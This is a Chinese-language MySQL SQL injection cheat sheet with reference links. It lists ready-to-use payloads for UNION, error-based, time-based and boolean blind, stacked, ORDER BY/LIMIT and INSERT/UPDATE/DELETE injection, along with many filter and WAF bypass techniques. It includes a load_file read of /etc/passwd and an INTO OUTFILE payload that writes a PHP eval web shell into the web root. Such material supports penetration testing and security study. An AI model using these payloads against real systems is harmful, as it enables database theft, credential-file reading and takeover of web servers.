常见基本信息

数据库名:database()
数据库版本:version()
当前用户:user()
操作系统:@@version_compile_os
数据库路径:@@datedir
mysql安装路径:@@basedir

UNION注入

猜字段长度

order by num

num为数字,从1开始以此加1,假如1,2,3,4返回正常,5返回错误那么字段长度为4

暴字段

假如有4个字段那么

id=-1 union select 1,2,3,4

数值为0或者负数

暴内容

例如

id=-1 union select 1,user(),database(),4

有字段的地方都可以实现查询

过滤逗号绕过(join绕过)

id=-1 union select 1,2,3,4
id=-1 union select * from (select 1)a join (select 2)b join (select 3)c join(select 4)d

报错注入

updatexml(有长度限制,最长32位)

id=1 and updatexml(1,concat(0x7e,user(),0x7e),1)

过滤concat函数就用make_set函数

id=1 and updatexml(1,make_set(3,0x7e,user()),1)

ExtractValue(有长度限制,最长32位)

id=1 and extractvalue(1,concat(0x7e,user(),0x7e))

过滤concat函数就用make_set函数

exp(5.5.5以上)

id=1 and (select exp(~(select * from(select user())x)))

floor

id=1 OR (SELECT 8627 FROM(SELECT COUNT(*),CONCAT(0x70307e,(SELECT user()),0x7e7030,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

polygon

id =1 AND polygon((select * from(select * from(select user())a)b))

GeometryCollection

id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))

multipoint

id = 1 AND multipoint((select * from(select * from(select user())a)b))

multilinestring

id = 1 AND multilinestring((select * from(select * from(select user())a)b))

linestring

id = 1 AND LINESTRING((select * from(select * from(select user())a)b))

multipolygon

id =1 AND multipolygon((select * from(select * from(select user())a)b))

读写文件

读文件

select load_file('/etc/passwd')

写文件

select '<?php @eval($_POST[123]);?>' into outfile '/var/www/html/1.php'

时间盲注

sleep

mysql> select sleep(5);
+----------+
| sleep(5) |
+----------+
|        0 |
+----------+
1 row in set (5.00 sec)

benchmark

mysql> select benchmark(10000000,sha(1));
+----------------------------+
| benchmark(10000000,sha(1)) |
+----------------------------+
|                          0 |
+----------------------------+
1 row in set (2.79 sec)

笛卡尔积

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
+------------+
| count(*)   |
+------------+
| 2651020120 |
+------------+
1 row in set (1 min 51.05 sec)

get_lock

延时精确可控,利用环境有限(需要提供长连接,在Apache+PHP搭建的环境中需要使用 mysql_pconnect函数来连接数据库),需要开两个session测试
SESSION A

mysql> select get_lock('test',1);
+--------------------+
| get_lock('test',1) |
+--------------------+
|                  1 |
+--------------------+
1 row in set (0.00 sec)

SESSION B

mysql> select get_lock('test',5);
+--------------------+
| get_lock('test',5) |
+--------------------+
|                  0 |
+--------------------+
1 row in set (5.00 sec)

rlike

通过rpadrepeat构造长字符串,加以计算量大的pattern,通过repeat的参数可以控制延时长短。

ysql> select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
+-------------------------------------------------------------+
| rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b') |
+-------------------------------------------------------------+
|                                                           0 |
+-------------------------------------------------------------+
1 row in set (5.27 sec)

不确定正则

select if(substr((select 1)='1',1,1),concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',1);

布尔盲注

逻辑判断基本就那些函数:

left(user(),1)>'r'  
right(user(),1)>'r'  
substr(user(),1,1)='r'  
mid(user(),1,1)='r' 
greatest("sed",database())= "sed" //返回最大值再与字符串比较
select least("sea",database())="sea"; //返回最小值再与字符串比较
    
//不使用逗号 
user() regexp '^[a-z]'
user() like 'root%' //注意_/%通配符,建议写脚本的时候时候写到字符集最后面
POSITION('root' in user())
mid(user() from 1 for 1)='r'
mid(user() from 1)='r'

ASCII()、ORD()和CHAR()函数一般用做辅助

order by后的注入

报错注入

and extractvalue(1, concat(0x7e, (select @@version),0x7e))

布尔盲注、时间盲注

order by if()

limit后的注入

不存在order by关键字

mysql> select id from users limit 0,1 union select user();
+----------------+
| id             |
+----------------+
| 1              |
| root@localhost |
+----------------+
2 rows in set (0.00 sec)

存在order by关键字

这下就会出现报错

mysql> select id from users order by id desc limit 0,1 union select user();
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY

5.0.0< MySQL <5.6.6版本可以使用procedure和into,但是 INTO 后面写入文件需要知道绝对路径以及写入shell的权限,因此利用比较难,这里就考虑procedure

报错注入

mysql> select * from users where id>1 order by id limit 1,1 procedure analyse(extractvalue(1,concat(0x7e,user(),0x7e)),1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

延时注入

mysql> select * from users where id>1 order by id limit 1,1 procedure analyse(extractvalue(1,concat(0x7e,if((length(database())=8),(benchmark(1000000,sha(1))),1),0x7e)),1);
ERROR 1105 (HY000): XPATH syntax error: '~0~'

Insert&Update&Delete注入

insert、update、Delete一般使用报错注入,白盒也可以采用闭合的方式注入

mysql> insert into users values(1,'test' and extractvalue(1,concat(0x7e,user(),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
mysql> update users set username='test' where id=1 and extractvalue(1,concat(0x7e,user(),0x7e));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
mysql> delete from users where id=1 and extractvalue(1,concat(0x7e,user(),0x7e));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

如果没有错误回显就可以使用延时注入

mysql> insert into users values(1,'test','test' or (if((length(database())=8),sleep(5),1)));
ERROR 1062 (23000): Duplicate entry '1' for key 'PRIMARY'
mysql> update users set username='test' where id=1 and if((length(database())=8),sleep(5),1);
Query OK, 0 rows affected (5.00 sec)
Rows matched: 0  Changed: 0  Warnings: 0
mysql> delete from users where id=1 and if((length(database())=8),sleep(5),1);
Query OK, 0 rows affected (5.00 sec)

堆叠注入

mysql> select * from users where id=1;select user();
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)

mysql约束攻击

SQL中执行字符串处理时,字符串末尾的空格符将会被删除。换句话说“vampire”等同于“vampire ”,对于绝大多数情况来说都是成立的(诸如WHERE子句中的字符串或INSERT语句中的字符串)
mysql数据库中当插入某个字段的值超过了预设的长度,mysql会自动造成截断.

mysql>  create table user(id int primary key,user varchar(10),pwd varchar(20));
Query OK, 0 rows affected (0.38 sec)

mysql> insert into user value(1,'admin','123');
Query OK, 1 row affected (0.00 sec)

mysql> insert into user value(2,'admin          ','456');
Query OK, 1 row affected, 1 warning (0.00 sec)

mysql> select * from user;
+----+------------+------+
| id | user       | pwd  |
+----+------------+------+
|  2 | admin      | 456  |
|  1 | admin      | 123  |
+----+------------+------+
2 rows in set (0.00 sec)

mysql> select length(user) from user;
+--------------+
| length(user) |
+--------------+
|           10 |
|            5 |
+--------------+
2 rows in set (0.00 sec)

长度是不一样的,但是在受影响的版本中,id=2useradmin 在前端登录处登录并且在后端验证中,admin
是等同id=1useradmin的.

pow溢出报错注入

pow(x,y)表示计算x的y次方,当计算值过大就会发生Double溢出,数据库报错

mysql> select * from users where id=1 and if((length(database())=8),pow(9,99999999999999),1);
ERROR 1690 (22003): DOUBLE value is out of range in 'pow(9,99999999999999)'
mysql> select * from users where id=1 and if((length(database())=7),pow(9,99999999999999),1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

XOR异或注入

过滤了and、or、union
异或运算规则:

1^1=0 0^0=0 0^1=1
1^1^1=0 1^1^0=0

判断关键字是否过滤

?id=1' ^ (length('union')=5)--+

union被过滤时1^0 输出id=1
union没被过滤时1^1输出id=0

bypass小结

过滤=绕过

可以使用likein

过滤<>比较符号绕过

使用greatestbetween绕过
greatest(x,y,z,..)返回它们的最大值

select * from users where id=1 and ascii(substr(database(),0,1))>64

可改为

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64
select * from users where id>1 and id<5

可改为

select * from users where id between 1 and 5

过滤空格绕过

可使用

1.()

2./**/或/*1*/

3.%0d %0a %0c %0b %a0

4.+

5.TAB

6.两个括号

7.把上面说的编一下码试试

过滤删除绕过

比如说他过滤了/**/(将其删除)又过滤了select那么我们可以这么写

sel/**/ect

意思就是被删除的可以加在另一个要删除的里面,这样不仅不会识别,删除后又还原了,实现绕过,这里面还包括双写被过滤字符的方法

大小写绕过

UnIon、OrdEr

内联注释绕过

/*!union*/+selEct/*!table_name*/

符号代替文字绕过

1.&&代替and
2.||代替or
3.| 代替 xor

等价函数变量的绕过

1.hex()、bin() ==> ascii()

2.sleep() ==>benchmark()

3.concat_ws()==>group_concat()

4.mid()、substr() ==> substring()

5.@@user ==> user()

6.@@datadir ==> datadir()

7.@@version ==> version()

编码绕过

URLEncode编码,url双重编码,ASCIIhexunicode编码绕过

1.URL编码:or 1=1即%6f%72%20%31%3d%31

2.url双重编码; ?id=1%252f%252a\*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a\*/FROM%252f%252a\*/Users--+

3.hex编码:见16进制绕过单引号

4.ascii编码: SELECT FROM Users WHERE username = CHAR(101, 97, 105, 116)

或者

char(101)+char(97)+char(105)+char(116)

5.unicode编码:
一些unicode编码举例:
单引号:

%u0027 %u02b9 %u02bc
%u02c8 %u2032
%uff07 %c0%27
%c0%a7 %e0%80%a7

空白:

%u0020 %uff00
%c0%20 %c0%a0 %e0%80%a0

左括号:

%u0028 %uff08
%c0%28 %c0%a8
%e0%80%a8

右括号:

%u0029 %uff09
%c0%29 %c0%a9
%e0%80%a9

6.html 实体编码:

SELECT FROM Users WHERE username = &#39;admin&#39;

逗号过滤绕过

用上面的join绕过

常见绕过方式

1.id=1+(UnIoN)+(SelECT)+

2.id=1+(UnIoN+SeLeCT)+

3.id=1+(UnI)(oN)+(SeL)(EcT)

4.id=1+’UnI’’On’+’SeL’’ECT’    <-MySQL only

5.id=1+’UnI’||’on’+SeLeCT’    <-MSSQL only

常见的注释

1.–+

2.#

3.%23

4.– -

5.%00

6.` 单行或者多行注释(别名)

7.// 单行或者多行注释

限制与from的组合

from. 代替 from

innodb

MySQL 5.7之后的版本,在其自带的 mysql 库中,新增了innodb_table_statsinnodb_index_stats这两张日志表。如果数据表的引擎是innodb ,则会在这两张表中记录表、键的信息 。
如果waf掉了information我们可以利用这两个表注入数据库名和表名

select * from mysql.innodb_table_stats;
select * from mysql.innodb_index_stats;

sys

MySQL 5.7版中,新加入了sys schema,里面整合了各种资料库资讯
其中对我们最有用的资讯大概就是statement_analysis表中的query,里面纪录着我们执行过的SQL语句(normalize过的)和一些数据。

select query from sys.statement_analysis;

参考链接

http://p0desta.com/2018/03/29/SQL%E6%B3%A8%E5%85%A5%E5%A4%87%E5%BF%98%E5%BD%95/#2-Oracle
https://www.k0rz3n.com/2017/11/21/mysqltrick/#%E5%A6%82%E6%9E%9C%E9%81%87%E5%88%B0%E8%A1%A8%E5%90%8D%E6%88%96%E8%80%85%E5%AD%97%E6%AE%B5%E5%90%8D%E6%98%AF%E4%BF%9D%E7%95%99%E5%AD%97
https://www.cdxy.me/?p=789